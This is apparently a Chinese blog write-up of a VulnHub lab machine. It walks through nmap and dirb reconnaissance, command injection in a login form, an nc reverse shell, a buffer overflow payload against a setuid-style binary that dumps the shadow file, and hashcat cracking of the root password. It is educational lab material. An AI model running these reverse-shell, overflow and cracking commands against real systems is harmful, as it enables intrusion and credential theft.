靶机

靶机来源vulnhub

下载 ova文件,VM 或 VB 都是可以直接打开的

渗透

具体可以详细可以参阅 YouTube

我这里来记录下我的过程

扫主机

nmap 10.0.0.0/24我的是这个网段

或者直接使用netdiscover进行主机发现,比不过比较慢

我这里的靶机IP是10.0.0.141

扫服务 nmap -A 10.0.0.141 扫出具体的端口及其服务。

发现 22 端口和 80 直接访问80

打开看是一个登陆页面,随意点点看,有个登陆页

后台路径遍历

dirb http://10.0.0.141 /var/share/wordlists/dirb/common.txt

没有扫出什么有用的,搞登陆页

登陆页

弱口令试试,没发现什么。hydra 爆破 http有待学习,

根据视频提示username 参数有代码执行

代码执行

这里直接上一个nc的反弹shell

nc 10.0.0.141 8848 -t -e /bin/bash

攻击机这边监听

nc -lnvp 8848

界面不好看,上一个python的pty

python -c "import pty;pty.spawn('/bin/bash')"

一个有溢出的文件

在/home/silky目录下有个cat_shad的文件,我们把它下载下来

python -m SimpleHTTPServer 8822
SimpleHTTPServer这个是python自带的库,注意大小写

下载好后,直接ida看一下,发现需要溢出覆盖参数 ‘a’* 0x40 + flag 这个flag就需要是 0x496C5962 由于是小端序所以我们的脚本要这样写

python -c “print ‘a’*0x40 +’\x62\x59\x6c\x49’”,这样的结果是我们输入的结果了

学习一下这个命令

./cat_shadow $(python -c "print 'a'*0x40 +'\x62\x59\x6c\x49'")

这样可以直接回显shadow文件,然后使用hashcat 爆破root 密码

sudo hashcat --force -w 3 -a 0 -m 1800 --remove -o linux.out linux.int /usr/share/wordlists/rockyou.txt

我虚拟机给的双核,10分钟就跑出来了

hashcat学习地址



CTF  

linux web渗透

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!